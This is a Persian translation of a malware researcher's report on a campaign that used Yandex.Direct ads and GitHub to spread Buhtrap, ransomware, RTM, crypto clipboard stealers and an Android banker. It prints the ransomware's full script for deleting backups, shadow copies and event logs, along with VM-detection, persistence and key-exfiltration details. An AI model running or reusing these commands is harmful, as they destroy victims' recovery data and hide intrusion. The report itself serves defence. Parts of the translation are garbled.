ProHoster > وبلاگ > اداره > درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند

درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند

برای هدف قرار دادن حسابداران در یک حمله سایبری، می توانید از اسناد کاری که آنها به صورت آنلاین جستجو می کنند استفاده کنید. این تقریباً همان کاری است که یک گروه سایبری در چند ماه گذشته انجام داده است و درهای پشتی شناخته شده را توزیع می کند. بوتراپ и RTMو همچنین رمزگذارها و نرم افزارهایی برای سرقت ارزهای دیجیتال. بیشتر اهداف در روسیه قرار دارند. این حمله با قرار دادن تبلیغات مخرب در Yandex.Direct انجام شد. قربانیان احتمالی به وب سایتی هدایت شدند که در آنجا از آنها خواسته شد تا فایل مخربی را که به عنوان یک الگوی سند پنهان شده بود دانلود کنند. Yandex تبلیغات مخرب را پس از هشدار ما حذف کرد.

کد منبع Buhtrap در گذشته به صورت آنلاین به بیرون درز کرده است تا همه بتوانند از آن استفاده کنند. ما هیچ اطلاعاتی در مورد در دسترس بودن کد RTM نداریم.

در این پست به شما خواهیم گفت که چگونه مهاجمان بدافزار را با استفاده از Yandex.Direct توزیع کرده و آن را در GitHub میزبانی کردند. این پست با تجزیه و تحلیل فنی بدافزار به پایان می رسد.

درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند

Buhtrap و RTM به تجارت بازگشته اند

مکانیسم گسترش و قربانیان

محموله های مختلف تحویل داده شده به قربانیان یک مکانیسم انتشار مشترک دارند. تمام فایل های مخرب ایجاد شده توسط مهاجمان در دو مخزن مختلف GitHub قرار داده شده است.

به طور معمول، مخزن حاوی یک فایل مخرب قابل دانلود بود که اغلب تغییر می کرد. از آنجایی که GitHub به شما امکان می دهد تاریخچه تغییرات یک مخزن را مشاهده کنید، می توانیم ببینیم که چه بدافزاری در یک دوره خاص توزیع شده است. برای متقاعد کردن قربانی برای دانلود فایل مخرب، از وب سایت blanki-shabloni24[.]ru که در شکل بالا نشان داده شده است استفاده شد.

طراحی سایت و نام تمامی فایل های مخرب از یک مفهوم پیروی می کند - فرم ها، قالب ها، قراردادها، نمونه ها و غیره. استراتژی در کمپین جدید یکسان است. تنها سوال این است که قربانی چگونه به سایت مهاجمان رسیده است.

عفونت

حداقل چندین قربانی احتمالی که در این سایت قرار گرفتند توسط تبلیغات مخرب جذب شدند. در زیر یک URL نمونه است:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

همانطور که از لینک مشاهده می کنید، بنر در انجمن حسابداری قانونی bb.f2[.]kz قرار گرفته است. توجه به این نکته ضروری است که بنرها در سایت های مختلف ظاهر شده اند، همه دارای شناسه کمپین یکسان (blanki_rsya) بوده و بیشتر مربوط به خدمات حسابداری یا کمک حقوقی است. URL نشان می دهد که قربانی بالقوه از درخواست "دانلود فرم فاکتور" استفاده کرده است، که از فرضیه ما در مورد حملات هدفمند پشتیبانی می کند. در زیر سایت هایی که بنرها ظاهر شده اند و عبارت های جستجوی مربوطه هستند.

  • دانلود فرم فاکتور – bb.f2[.]kz
  • نمونه قرارداد - Ipopen[.]ru
  • نمونه شکایت برنامه - 77metrov[.]ru
  • فرم توافق نامه - blank-dogovor-kupli-prodazhi[.]ru
  • نمونه دادخواست دادگاه - zen.yandex[.]ru
  • نمونه شکایت - yurday[.]ru
  • نمونه فرم های قرارداد - Regforum[.]ru
  • فرم قرارداد – assistentus[.]ru
  • نمونه قرارداد آپارتمان – napravah[.]com
  • نمونه قراردادهای حقوقی - avito[.]ru

سایت blanki-shabloni24[.]ru ممکن است برای گذراندن یک ارزیابی بصری ساده پیکربندی شده باشد. به طور معمول، تبلیغی که به سایتی با ظاهر حرفه ای با پیوند به GitHub اشاره می کند، بدیهی به نظر نمی رسد. علاوه بر این، مهاجمان فایل‌های مخرب را فقط برای مدت محدودی در مخزن آپلود کردند، احتمالاً در طول کمپین. در بیشتر مواقع، مخزن GitHub حاوی یک آرشیو زیپ خالی یا یک فایل EXE خالی بود. بنابراین، مهاجمان می‌توانند تبلیغات را از طریق Yandex.Direct در سایت‌هایی که به احتمال زیاد توسط حسابدارانی که در پاسخ به سؤالات جستجوی خاص از آنها بازدید کرده‌اند، توزیع کنند.

در مرحله بعد، بیایید به بارهای مختلف توزیع شده به این روش نگاه کنیم.

تجزیه و تحلیل بار

گاهشماری توزیع

این کمپین مخرب در پایان اکتبر 2018 آغاز شد و در زمان نگارش این مقاله فعال است. از آنجایی که کل مخزن به صورت عمومی در GitHub در دسترس بود، ما یک جدول زمانی دقیق از توزیع شش خانواده مختلف بدافزار گردآوری کردیم (شکل زیر را ببینید). برای مقایسه با تاریخچه git، خطی اضافه کرده‌ایم که نشان می‌دهد پیوند بنر چه زمانی کشف شد، همانطور که توسط تله‌متری ESET اندازه‌گیری شد. همانطور که می بینید، این به خوبی با در دسترس بودن بار در GitHub ارتباط دارد. اختلاف در پایان فوریه را می توان با این واقعیت توضیح داد که ما بخشی از تاریخچه تغییرات را نداشتیم زیرا قبل از اینکه بتوانیم آن را به طور کامل دریافت کنیم، مخزن از GitHub حذف شد.

درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند
شکل 1. کرونولوژی توزیع بدافزار.

گواهی امضای کد

این کمپین از چندین گواهی استفاده کرد. برخی از آنها توسط بیش از یک خانواده بدافزار امضا شده اند، که بیشتر نشان می دهد که نمونه های مختلف به یک کمپین تعلق دارند. با وجود در دسترس بودن کلید خصوصی، اپراتورها به طور سیستماتیک باینری ها را امضا نکردند و از کلید برای همه نمونه ها استفاده نکردند. در اواخر فوریه 2019، مهاجمان با استفاده از گواهی متعلق به گوگل که کلید خصوصی آن را نداشتند، شروع به ایجاد امضاهای نامعتبر کردند.

تمام گواهی‌های دخیل در کمپین و خانواده‌های بدافزارهایی که امضا می‌کنند در جدول زیر فهرست شده‌اند.

درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند

ما همچنین از این گواهی‌های امضای کد برای ایجاد پیوند با سایر خانواده‌های بدافزار استفاده کرده‌ایم. برای اکثر گواهی‌ها، نمونه‌هایی را پیدا نکردیم که از طریق مخزن GitHub توزیع نشده باشند. با این حال، گواهی TOV "MARIYA" برای امضای بدافزار متعلق به بات نت استفاده شد واچوس، ابزارهای تبلیغاتی مزاحم و ماینرها. بعید است که این بدافزار مربوط به این کمپین باشد. به احتمال زیاد، گواهی در دارک نت خریداری شده است.

Win32/Filecoder.Buhtrap

اولین مؤلفه ای که توجه ما را جلب کرد Win32/Filecoder.Buhtrap تازه کشف شده بود. این یک فایل باینری دلفی است که گاهی اوقات بسته بندی می شود. عمدتاً در فوریه تا مارس 2019 توزیع شد. همانطور که شایسته یک برنامه باج افزار است رفتار می کند - درایوهای محلی و پوشه های شبکه را جستجو می کند و فایل های شناسایی شده را رمزگذاری می کند. برای به خطر افتادن نیازی به اتصال اینترنت ندارد زیرا برای ارسال کلیدهای رمزگذاری با سرور تماس نمی گیرد. در عوض، یک «توکن» به انتهای پیام باج اضافه می‌کند و پیشنهاد می‌کند از ایمیل یا Bitmessage برای تماس با اپراتورها استفاده کنید.

برای رمزگذاری هرچه بیشتر منابع حساس، Filecoder.Buhtrap رشته‌ای را اجرا می‌کند که برای خاموش کردن نرم‌افزار کلیدی طراحی شده است که ممکن است دارای کنترل‌کننده‌های فایل باز حاوی اطلاعات ارزشمندی باشد که می‌تواند در رمزگذاری اختلال ایجاد کند. فرآیندهای هدف عمدتاً سیستم های مدیریت پایگاه داده (DBMS) هستند. علاوه بر این، Filecoder.Buhtrap فایل های گزارش و پشتیبان گیری را حذف می کند تا بازیابی اطلاعات را دشوار کند. برای انجام این کار، اسکریپت دسته ای زیر را اجرا کنید.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap از یک سرویس آنلاین IP Logger استفاده می کند که برای جمع آوری اطلاعات در مورد بازدیدکنندگان وب سایت طراحی شده است. این هدف برای ردیابی قربانیان باج افزار است که مسئولیت آن بر عهده خط فرمان است:

mshta.exe "javascript:document.write('');"

فایل‌های برای رمزگذاری در صورتی انتخاب می‌شوند که با سه فهرست حذف مطابقت نداشته باشند. اولاً، فایل‌های با پسوندهای زیر رمزگذاری نمی‌شوند: .com، .cmd، .cpl، .dll، .exe، .hta، .lnk، .msc، .msi، .msp، .pif، .scr، .sys و خفاش. ثانیاً، تمام فایل‌هایی که مسیر کامل آنها شامل رشته‌های دایرکتوری از لیست زیر است، حذف می‌شوند.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

سوم، نام فایل های خاصی نیز از رمزگذاری مستثنی می شوند، از جمله نام فایل پیام باج. لیست در زیر ارائه شده است. بدیهی است که تمام این استثنائات برای کارکردن دستگاه در نظر گرفته شده است، اما با حداقل قابلیت فنی.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

طرح رمزگذاری فایل

پس از اجرا، بدافزار یک جفت کلید RSA 512 بیتی تولید می کند. نماگر خصوصی (d) و مدول (n) سپس با یک کلید عمومی 2048 بیتی رمزگذاری شده (نمای عمومی و مدول)، zlib-packed و base64 رمزگذاری می شوند. کد مسئول این امر در شکل 2 نشان داده شده است.

درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند
شکل 2. نتیجه کامپایل کردن Hex-Rays فرآیند تولید جفت کلید RSA 512 بیتی.

در زیر نمونه ای از متن ساده با یک کلید خصوصی تولید شده است، که یک رمز متصل به پیام باج است.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

کلید عمومی مهاجمان در زیر آورده شده است.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

فایل ها با استفاده از AES-128-CBC با یک کلید 256 بیتی رمزگذاری می شوند. برای هر فایل رمزگذاری شده، یک کلید جدید و یک بردار اولیه جدید تولید می شود. اطلاعات کلیدی به انتهای فایل رمزگذاری شده اضافه می شود. بیایید فرمت فایل رمزگذاری شده را در نظر بگیریم.
فایل های رمزگذاری شده دارای هدر زیر هستند:

درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند

داده های فایل منبع با افزودن مقدار جادویی VEGA به 0x5000 بایت اول رمزگذاری می شود. تمام اطلاعات رمزگشایی به فایلی با ساختار زیر پیوست می شود:

درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند

- نشانگر اندازه فایل حاوی علامتی است که نشان می دهد اندازه فایل از 0x5000 بایت بیشتر است یا خیر.
- حباب کلید AES = ZlibCompress (RSAEncrypt (کلید AES + IV، کلید عمومی جفت کلید RSA تولید شده))
- حباب کلید RSA = ZlibCompress (RSAEncrypt (کلید خصوصی RSA تولید شده، کلید عمومی RSA با کد سخت))

Win32/ClipBanker

Win32/ClipBanker مؤلفه‌ای است که از اواخر اکتبر تا اوایل دسامبر 2018 به طور متناوب توزیع شده است. نقش آن نظارت بر محتویات کلیپ بورد است، به دنبال آدرس کیف پول های ارزهای دیجیتال می گردد. پس از تعیین آدرس کیف پول هدف، ClipBanker آن را با آدرسی که گمان می رود متعلق به اپراتورها باشد جایگزین می کند. نمونه هایی که ما بررسی کردیم نه جعبه ای بودند و نه مبهم. تنها مکانیزم مورد استفاده برای پنهان کردن رفتار رمزگذاری رشته است. آدرس های کیف پول اپراتور با استفاده از RC4 رمزگذاری می شوند. ارزهای دیجیتال هدف بیت کوین، بیت کوین کش، دوج کوین، اتریوم و ریپل هستند.

در طول دوره انتشار بدافزار به کیف پول های بیت کوین مهاجمان، مقدار کمی به VTS ارسال شد که موفقیت کمپین را زیر سوال می برد. علاوه بر این، هیچ مدرکی وجود ندارد که نشان دهد این تراکنش ها اصلاً با ClipBanker مرتبط بوده اند.

Win32/RTM

مؤلفه Win32/RTM برای چند روز در اوایل مارس 2019 توزیع شد. RTM یک بانکدار تروجان است که در دلفی نوشته شده است و هدف آن سیستم های بانکداری از راه دور است. در سال 2017، محققان ESET منتشر کردند تجزیه و تحلیل دقیق از این برنامه، توضیحات هنوز مرتبط است. در ژانویه 2019، شبکه پالو آلتو نیز منتشر شد پست وبلاگ در مورد RTM.

Buhtrap Loader

برای مدتی، یک دانلودر در GitHub در دسترس بود که شبیه ابزارهای قبلی Buhtrap نبود. رو می کند به https://94.100.18[.]67/RSS.php?<some_id> برای رسیدن به مرحله بعدی و بارگذاری مستقیم آن در حافظه. ما می توانیم دو رفتار کد مرحله دوم را تشخیص دهیم. در اولین URL، RSS.php به طور مستقیم از درپشتی Buhtrap عبور کرد - این درب پشتی بسیار شبیه به درب پشتی موجود پس از فاش شدن کد منبع است.

جالب اینجاست که ما شاهد چندین کمپین با درب پشتی Buhtrap هستیم و ظاهراً توسط اپراتورهای مختلف اداره می شوند. در این مورد، تفاوت اصلی این است که درب پشتی مستقیماً در حافظه بارگذاری می شود و از طرح معمول با فرآیند استقرار DLL که در مورد آن صحبت کردیم استفاده نمی کند. قبل از. علاوه بر این، اپراتورها کلید RC4 مورد استفاده برای رمزگذاری ترافیک شبکه را به سرور C&C تغییر دادند. در بیشتر کمپین‌هایی که دیده‌ایم، اپراتورها زحمت تغییر این کلید را نداشتند.

دومین رفتار پیچیده تر این بود که URL RSS.php به لودر دیگری ارسال شد. برخی مبهم‌سازی‌ها را اجرا کرد، مانند بازسازی جدول واردات پویا. هدف بوت لودر تماس با سرور C&C است msiofficeupd[.]com/api/F27F84EDA4D13B15/2، گزارش‌ها را ارسال کنید و منتظر پاسخ باشید. پاسخ را به صورت یک حباب پردازش می کند، آن را در حافظه بارگذاری می کند و آن را اجرا می کند. پیلودی که در اجرای این لودر دیدیم، همان درب پشتی Buhtrap بود، اما ممکن است اجزای دیگری نیز وجود داشته باشد.

Android/Spy.Banker

جالب اینجاست که یک جزء برای اندروید نیز در مخزن GitHub یافت شد. او فقط یک روز در شعبه اصلی بود - 1 نوامبر 2018. به غیر از پست شدن در GitHub، تله متری ESET هیچ مدرکی دال بر توزیع این بدافزار پیدا نمی کند.

این مؤلفه به عنوان یک بسته برنامه Android (APK) میزبانی شد. به شدت مبهم است. رفتار مخرب در یک JAR رمزگذاری شده در APK پنهان می شود. با استفاده از این کلید با RC4 رمزگذاری می شود:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

از همان کلید و الگوریتم برای رمزگذاری رشته ها استفاده می شود. JAR در واقع شده است APK_ROOT + image/files. 4 بایت اول فایل حاوی طول JAR رمزگذاری شده است که بلافاصله پس از فیلد طول شروع می شود.

پس از رمزگشایی فایل، متوجه شدیم که آنوبیس بوده است - قبلا ثبت شده بانکدار برای اندروید. بدافزار دارای ویژگی های زیر است:

  • ضبط میکروفون
  • گرفتن اسکرین شات
  • دریافت مختصات GPS
  • کی لاگر
  • رمزگذاری داده های دستگاه و تقاضای باج
  • ارسال هرزنامه

جالب اینجاست که این بانکدار از توییتر به عنوان یک کانال ارتباطی پشتیبان برای به دست آوردن یک سرور C&C دیگر استفاده کرد. نمونه ای که ما تجزیه و تحلیل کردیم از حساب @JonesTrader استفاده می کرد، اما در زمان تجزیه و تحلیل از قبل مسدود شده بود.

بانکدار حاوی لیستی از برنامه های هدف در دستگاه اندروید است. این بیشتر از لیست به دست آمده در مطالعه Sophos است. این لیست شامل بسیاری از برنامه های بانکی، برنامه های خرید آنلاین مانند آمازون و eBay و خدمات ارزهای دیجیتال است.

MSIL/ClipBanker.IH

آخرین مؤلفه ای که به عنوان بخشی از این کمپین توزیع شد، فایل اجرایی دات نت ویندوز بود که در مارس 2019 ظاهر شد. اکثر نسخه های مورد مطالعه با ConfuserEx v1.0.0 بسته بندی شده بودند. مانند ClipBanker، این کامپوننت از کلیپ بورد استفاده می کند. هدف او طیف گسترده ای از ارزهای دیجیتال و همچنین پیشنهادات در Steam است. علاوه بر این، او از سرویس IP Logger برای سرقت کلید WIF خصوصی بیت کوین استفاده می کند.

مکانیسم های حفاظتی
علاوه بر مزایایی که ConfuserEx در جلوگیری از اشکال زدایی، تخلیه و دستکاری ارائه می دهد، این مؤلفه شامل توانایی شناسایی محصولات آنتی ویروس و ماشین های مجازی است.

برای تأیید اینکه در یک ماشین مجازی اجرا می شود، بدافزار از خط فرمان WMI داخلی ویندوز (WMIC) برای درخواست اطلاعات بایوس استفاده می کند، یعنی:

wmic bios

سپس برنامه خروجی فرمان را تجزیه می کند و به دنبال کلمات کلیدی می گردد: VBOX، VirtualBox، XEN، qemu، bochs، VM.

برای شناسایی محصولات آنتی ویروس، بدافزار یک درخواست ابزار مدیریت ویندوز (WMI) را با استفاده از Windows Security Center ارسال می کند ManagementObjectSearcher API همانطور که در زیر نشان داده شده است. پس از رمزگشایی از base64، تماس به صورت زیر است:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند
شکل 3. فرآیند شناسایی محصولات آنتی ویروس.

علاوه بر این، بدافزار بررسی می کند که آیا CryptoClipWatcherابزاری برای محافظت در برابر حملات کلیپ بورد و در صورت اجرا، تمام رشته ها را در آن فرآیند به حالت تعلیق در می آورد و در نتیجه حفاظت را غیرفعال می کند.

ماندگاری

نسخه بدافزاری که ما مطالعه کردیم خودش را در آن کپی می کند %APPDATA%googleupdater.exe و صفت "مخفی" را برای دایرکتوری گوگل تنظیم می کند. سپس او مقدار را تغییر می دهد SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell در رجیستری ویندوز قرار می گیرد و مسیر را اضافه می کند updater.exe. به این ترتیب هر بار که کاربر وارد سیستم می شود، بدافزار اجرا می شود.

رفتار بدخواهانه

مانند ClipBanker، این بدافزار محتویات کلیپ بورد را رصد می کند و به دنبال آدرس های کیف پول ارزهای دیجیتال می گردد و زمانی که پیدا شد، آن را با یکی از آدرس های اپراتور جایگزین می کند. در زیر لیستی از آدرس های هدف بر اساس آنچه در کد یافت می شود، آمده است.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

برای هر نوع آدرس یک عبارت منظم مربوطه وجود دارد. مقدار STEAM_URL برای حمله به سیستم Steam استفاده می شود، همانطور که از عبارت منظمی که برای تعریف در بافر استفاده می شود مشاهده می شود:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

کانال اکسفیلتراسیون

این بدافزار علاوه بر جایگزینی آدرس‌ها در بافر، کلیدهای WIF خصوصی کیف پول‌های بیت‌کوین، بیت‌کوین کور و الکتروم بیت‌کوین را هدف قرار می‌دهد. این برنامه از plogger.org به عنوان یک کانال خروجی برای به دست آوردن کلید خصوصی WIF استفاده می کند. برای انجام این کار، اپراتورها داده های کلید خصوصی را به سربرگ User-Agent HTTP اضافه می کنند، همانطور که در زیر نشان داده شده است.

درب پشتی و رمزگذار Buhtrap با استفاده از Yandex.Direct توزیع شدند
شکل 4. کنسول IP Logger با داده های خروجی.

اپراتورها از iplogger.org برای استخراج کیف پول استفاده نکردند. آنها احتمالاً به دلیل محدودیت 255 کاراکتری در این زمینه، به روش دیگری متوسل شدند User-Agentدر رابط وب IP Logger نمایش داده می شود. در نمونه هایی که مطالعه کردیم، سرور خروجی دیگر در متغیر محیطی ذخیره شد DiscordWebHook. با کمال تعجب، این متغیر محیطی در هیچ کجای کد اختصاص داده نشده است. این نشان می دهد که بدافزار هنوز در حال توسعه است و متغیر به دستگاه تست اپراتور اختصاص داده شده است.

نشانه دیگری وجود دارد که برنامه در حال توسعه است. فایل باینری شامل دو نشانی اینترنتی iplogger.org است و هر دو هنگام استخراج داده ها مورد پرسش قرار می گیرند. در یک درخواست به یکی از این URL ها، مقدار موجود در قسمت Referer قبل از "DEV /" قرار می گیرد. ما همچنین نسخه ای را پیدا کردیم که با استفاده از ConfuserEx بسته بندی نشده بود، گیرنده این URL DevFeedbackUrl نام دارد. بر اساس نام متغیر محیطی، ما معتقدیم که اپراتورها قصد دارند از سرویس قانونی Discord و سیستم رهگیری وب آن برای سرقت کیف پول‌های ارزهای دیجیتال استفاده کنند.

نتیجه

این کمپین نمونه ای از استفاده از خدمات تبلیغاتی قانونی در حملات سایبری است. این طرح سازمان‌های روسی را هدف قرار می‌دهد، اما اگر شاهد چنین حمله‌ای با استفاده از خدمات غیرروسی باشیم، تعجب نخواهیم کرد. برای جلوگیری از سازش، کاربران باید از اعتبار منبع نرم افزاری که دانلود می کنند مطمئن باشند.

فهرست کاملی از شاخص‌های سازش و ویژگی‌های MITER ATT&CK در اینجا موجود است پیوند.

منبع: www.habr.com

اضافه کردن نظر